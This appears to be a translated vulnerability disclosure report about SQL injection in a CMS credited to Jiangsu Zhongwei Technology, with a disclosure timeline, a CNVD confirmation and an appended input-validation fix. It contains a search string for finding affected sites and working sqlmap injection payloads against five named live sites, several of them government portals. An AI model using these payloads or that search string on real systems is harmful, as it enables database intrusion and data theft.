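2015-04-16: Details reported to the vendor; awaiting vendor handling
2015-04-21: Vendor confirmed; details disclosed to the vendor only
2015-04-24: Details opened to third-party security partners
2015-06-15: Details disclosed to core white hats and experts in related fields
2015-06-25: Details disclosed to regular white hats
2015-07-05: Details disclosed to intern white hats
2015-07-20: Details disclosed to the public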
Google search: 技术支持:江苏中威科技 ("Technical support: Jiangsu Zhongwei Technology")
Case 1: http://cxsq.suqian.gov.cn/sqscms/show/protal_noticeContext.do?template=tpxw&pagesize=6&column=402880f830889db1013088cab8f80001
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: column (GET)
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: template=tpxw&pagesize=6&column=402880f830889db1013088cab8f80001' AND 7751=DBMS_PIPE.RECEIVE_MESSAGE(CHR(84)||CHR(116)||CHR(76)||CHR(90),5) AND 'JyqW'='JyqW
---
web application technology: JSP
back-end DBMS: Oracle
Case 2: http://www.ntzb.cn:8083/cms/show/protal_noticeContext.do?template=tpxw&pagesize=6&column=402880f830889db1013088cab8f80001
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: column (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: template=tpxw&pagesize=6&column=402880f830889db1013088cab8f80001' AND 5115=5115 AND 'YRdd'='YRdd

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: template=tpxw&pagesize=6&column=402880f830889db1013088cab8f80001' AND 1431=DBMS_PIPE.RECEIVE_MESSAGE(CHR(89)||CHR(75)||CHR(76)||CHR(74),5) AND 'WOin'='WOin
---
web application technology: JSP
back-end DBMS: Oracle
Case 3: http://58.221.232.41/jslyqtkfq/show/protal_noticeContext.do?template=tpxw&pagesize=6&column=402880f830889db1013088cab8f80001
sqlmap identified the following injection points with a total of 124 HTTP(s) requests:
---
Parameter: column (GET)
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: template=tpxw&pagesize=6&column=402880f830889db1013088cab8f80001' AND 1734=DBMS_PIPE.RECEIVE_MESSAGE(CHR(119)||CHR(110)||CHR(83)||CHR(99),5) AND 'rzLr'='rzLr
---
web application technology: JSP
back-end DBMS: Oracle
Case 4: http://cxsy.siyang.gov.cn/syxcms/show/protal_noticeContext.do?template=tpxw&pagesize=6&column=402880f830889db1013088cab8f80001
sqlmap identified the following injection points with a total of 124 HTTP(s) requests:
---
Parameter: column (GET)
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: template=tpxw&pagesize=6&column=402880f830889db1013088cab8f80001' AND 9011=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(87)||CHR(103)||CHR(103),5) AND 'kCEL'='kCEL
---
web application technology: JSP
back-end DBMS: Oracle
Case 5: http://cxsh.sihong.gov.cn/shcms/show/protal_noticeContext.do?template=tpxw&pagesize=6&column=402880f830889db1013088cab8f80001
sqlmap identified the following injection points with a total of 66 HTTP(s) requests:
---
Parameter: column (GET)
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: template=tpxw&pagesize=6&column=402880f830889db1013088cab8f80001' AND 2308=DBMS_PIPE.RECEIVE_MESSAGE(CHR(102)||CHR(67)||CHR(71)||CHR(81),5) AND 'tcAy'='tcAy
---
web application technology: JSP
back-end DBMS: Oracle
Filter.
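One way to express the one-word fix recommendation above as a strict allowlist on the `protal_noticeContext.do` query string. This is an added example, not code from the report or from the vendor's CMS; the per-parameter rules are assumptions inferred only from the values shown in the five cases (a 32-character lowercase hex `column`, a numeric `pagesize`, a short alphanumeric `template`), and the host is a constructed placeholder.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed allowlist, inferred from the parameter values shown in the report.
RULES = {
    "template": re.compile(r"[A-Za-z0-9_]{1,32}"),
    "pagesize": re.compile(r"[0-9]{1,3}"),
    "column": re.compile(r"[0-9a-f]{32}"),
}
ENDPOINT = "protal_noticeContext.do"
BASE = "http://cms.example.test/cms/show/" + ENDPOINT  # constructed placeholder host
GOOD_ID = "402880f830889db1013088cab8f80001"

# Constructed sample requests: clean, quote-suffixed, duplicated, missing.
SAMPLES = [
    BASE + "?template=tpxw&pagesize=6&column=" + GOOD_ID,
    BASE + "?template=tpxw&pagesize=6&column=" + GOOD_ID + "%27%20AND%20%271%27%3D%271",
    BASE + "?template=tpxw&pagesize=6&column=" + GOOD_ID + "&column=" + GOOD_ID,
    BASE + "?template=tpxw&pagesize=6",
]


def rejected_params(url):
    """Return sorted names of query parameters that fail the allowlist.

    An empty list means the request may proceed. URLs for other endpoints
    are out of scope here and also return an empty list.
    """
    parts = urlsplit(url)
    if not parts.path.endswith("/" + ENDPOINT):
        return []
    # parse_qs percent-decodes values; keep blanks so "column=" is checked.
    query = parse_qs(parts.query, keep_blank_values=True)
    bad = set()
    for name, values in query.items():
        rule = RULES.get(name)
        if rule is None:
            bad.add(name)  # unknown parameter: reject rather than ignore
        elif len(values) != 1 or not rule.fullmatch(values[0]):
            # fullmatch: the whole value must fit, so a valid id followed by
            # a quote fails; repeated parameters are rejected as ambiguous.
            bad.add(name)
    bad.update(n for n in RULES if n not in query)  # required but missing
    return sorted(bad)


if __name__ == "__main__":
    for sample in SAMPLES:
        print(rejected_params(sample) or "ok", sample)
```

Validation of this kind only narrows what reaches the database; the query that consumes `column` should still pass it as a bind variable rather than concatenating it into the SQL string.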
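Severity: High
Vulnerability Rank: 15
Confirmed: 2015-04-21 11:06
CNVD confirmed the situation described and has passed it through CNCERT to the Jiangsu branch center, which will follow up and coordinate handling with the organizations that operate the sites.
None yet.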